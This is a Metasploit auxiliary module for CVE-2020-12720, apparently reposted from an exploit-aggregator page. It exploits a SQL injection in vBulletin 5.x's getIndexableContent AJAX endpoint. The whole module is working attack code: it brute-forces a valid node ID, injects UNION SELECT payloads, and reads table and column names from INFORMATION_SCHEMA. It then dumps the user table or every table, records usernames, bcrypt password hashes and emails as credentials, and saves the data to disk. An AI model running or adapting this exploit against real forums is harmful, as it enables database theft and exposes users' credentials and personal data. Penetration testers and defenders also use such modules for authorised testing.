Share
## https://sploitus.com/exploit?id=PACKETSTORM:180699
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5.x.x to dump the user
table information or to dump all of the vBulletin tables (based on the selected options). This
module has been tested successfully on VBulletin Version 5.6.1 on Ubuntu Linux.
},
'License' => MSF_LICENSE,
'Author' => [
'Charles Fol <folcharles[at]gmail.com>', # (@cfreal_) CVE
'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
],
'References' => [
['CVE', '2020-12720']
],
'Actions' => [
['DumpUser', { 'Description' => 'Dump only user table used by vbulletin.' }],
['DumpAll', { 'Description' => 'Dump all tables used by vbulletin.' }]
],
'DefaultAction' => 'DumpUser',
'DisclosureDate' => '2020-03-12',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path to vBulletin', '/']),
OptInt.new('NODE', [false, 'Valid Node ID']),
OptInt.new('MINNODE', [true, 'Valid Node ID', 1]),
OptInt.new('MAXNODE', [true, 'Valid Node ID', 200]),
])
end
# Performs SQLi attack
def do_sqli(node_id, tbl_prfx, field, table, condition = nil, limit = nil)
where_cond = condition.nil? || condition == '' ? '' : "where #{condition}"
limit_cond = limit.nil? || limit == '' ? '' : "limit #{limit}"
injection = " UNION ALL SELECT 0x2E,0x74,0x68,0x65,0x2E,0x65,0x78,0x70,0x6C,0x6F,0x69,0x74,0x65,0x65,0x72,0x73,0x2E,#{field},0x2E,0x7A,0x65,0x6E,0x6F,0x66,0x65,0x78 "
injection << "from #{tbl_prfx}#{table} #{where_cond} #{limit_cond} --"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'content_infraction', 'getIndexableContent'),
'vars_post' => {
'nodeId[nodeid]' => "#{node_id}#{injection}"
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && parsed_resp['rawtext']
parsed_resp['rawtext']
end
# Gets the prefix to the SQL tables used in vbulletin install
def get_table_prefix(node_id)
print_status('Attempting to determine the vBulletin table prefix.')
table_name = do_sqli(node_id, '', 'table_name', 'information_schema.columns', "column_name='phrasegroup_cppermission'")
unless table_name && table_name.split('language').index
fail_with(Failure::Unknown, 'Could not determine the vBulletin table prefix.')
end
table_prfx = table_name.split('language')[0]
print_good("Successfully retrieved table to get prefix from #{table_name}.")
table_prfx
end
# Brute force a nodeid (attack requires a valid nodeid)
def brute_force_node
min = datastore['MINNODE']
max = datastore['MAXNODE']
if min > max
print_error("MINNODE can't be major than MAXNODE.")
return nil
end
for node_id in min..max
if exists_node?(node_id)
return node_id
end
end
nil
end
# Checks if a nodeid is valid
def exists_node?(id)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ajax', 'api', 'node', 'getNode'),
'vars_post' => {
'nodeid' => id.to_s
}
})
return nil unless res && res.code == 200 && (parsed_resp = res.get_json_document) && !parsed_resp['errors']
print_good("Successfully found node at id #{id}")
true
end
# Gets a node through BF or user supplied value
def get_node
if datastore['NODE'].nil? || datastore['NODE'] <= 0
print_status('Brute forcing to find a valid node id.')
return brute_force_node
end
print_status("Checking node id '#{datastore['NODE']}'.")
return datastore['NODE'] if exists_node?(datastore['NODE'])
nil
end
# Report credentials to MSF DB
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user]
}.merge(service_data)
if opts[:password]
credential_data.merge!(
private_data: opts[:password],
private_type: :nonreplayable_hash,
jtr_format: 'bcrypt'
)
end
login_data = {
core: create_credential(credential_data),
status: opts[:status],
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
# Get columns for table
def get_table_columns(node_id, table_prfx, table)
print_status("Getting table columns for #{table_prfx}#{table}")
columns_cnt = do_sqli(node_id, '', 'COUNT(COLUMN_NAME)', 'INFORMATION_SCHEMA.COLUMNS', "TABLE_NAME='#{table_prfx}#{table}'")
fail_with(Failure::UnexpectedReply, "Could not get count of columns for #{table_prfx}#{table}.") unless columns_cnt
columns = []
for idx in 0..columns_cnt.to_i
column = do_sqli(node_id, '', 'COLUMN_NAME', 'INFORMATION_SCHEMA.COLUMNS', "TABLE_NAME='#{table_prfx}#{table}'", "#{idx}, #{idx + 1}")
columns << column
end
print_good("Retrieved #{columns_cnt} columns for #{table_prfx}#{table}")
columns
end
# Gets rows from table
def get_all_rows(node_id, table_prfx, table, columns)
print_status("Dumping table #{table_prfx}#{table}")
field_var = 'concat('
columns.each do |col|
if !col.blank?
field_var << "COALESCE(#{col},''),0x7C,"
end
end
field_var << '\'\')'
row_cnt = do_sqli(node_id, table_prfx, 'COUNT(*)', "#{table_prfx}#{table}")
if row_cnt.nil? || row_cnt.to_i < 0
print_status('Table contains 0 rows, skipping.')
return nil
end
print_status("Table contains #{row_cnt} rows, dumping (this may take a while).")
rows = []
for r_idx in 0..row_cnt.to_i - 1
field_hash = {}
fields = do_sqli(node_id, table_prfx, field_var.to_s, "#{table_prfx}#{table}", '', "#{r_idx}, #{r_idx + 1}")
field_list = fields.split('|')
field_list.each_with_index do |field, f_idx|
field_hash[columns[f_idx.to_i]] = field.to_s
end
unless field_hash['username'].blank? && table != /user/
print_good("Found credential: #{field_hash['username']}:#{field_hash['token']} (Email: #{field_hash['email']})")
report_cred(
ip: rhost,
port: datastore['RPORT'],
user: field_hash['username'].to_s,
password: field_hash['token'].to_s,
status: Metasploit::Model::Login::Status::UNTRIED,
jtr_format: 'bcrypt',
proof: field_hash.to_s
)
end
rows << field_hash
end
print_good("Retrieved #{row_cnt} rows for #{table_prfx}#{table}")
rows
end
# Get all tables in database with prefix
def get_all_tables(node_id, table_prfx)
print_status('Dumping all table names from INFORMATION_SCHEMA')
table_cnt = do_sqli(node_id, '', 'COUNT(TABLE_NAME)', 'INFORMATION_SCHEMA.TABLES', "TABLE_NAME like '#{table_prfx}%'")
fail_with(Failure::UnexpectedReply, "Could not get count of tables with prefix: #{table_prfx}.") unless table_cnt
tables = []
for idx in 0..table_cnt.to_i
table = do_sqli(node_id, '', 'TABLE_NAME', 'INFORMATION_SCHEMA.TABLES', "TABLE_NAME like '#{table_prfx}%'", "#{idx}, #{idx + 1}")
tables << table
end
print_good("Retrieved #{table_cnt} tables for #{table_prfx}")
tables
end
# Stores table data to file on disk
def store_data(data, name)
path = store_loot(name, 'text/plain', datastore['RHOST'], data.to_json, name)
print_good("Saved file to: #{path}")
end
# Performs all sql injection functionality
def run
# Get node_id for requests
node_id = get_node
fail_with(Failure::Unknown, 'Could not get a valid node id for the vBulletin install.') unless node_id
# Get vBulletin table prefix (from known vb table 'language')
table_prfx = get_table_prefix(node_id)
tables = action.name == 'DumpAll' ? get_all_tables(node_id, table_prfx) : ["#{table_prfx}user"]
tables.each do |table|
columns = get_table_columns(node_id, '', table)
rows = get_all_rows(node_id, '', table, columns)
store_data(rows, table.to_s) unless rows.nil?
end
end
end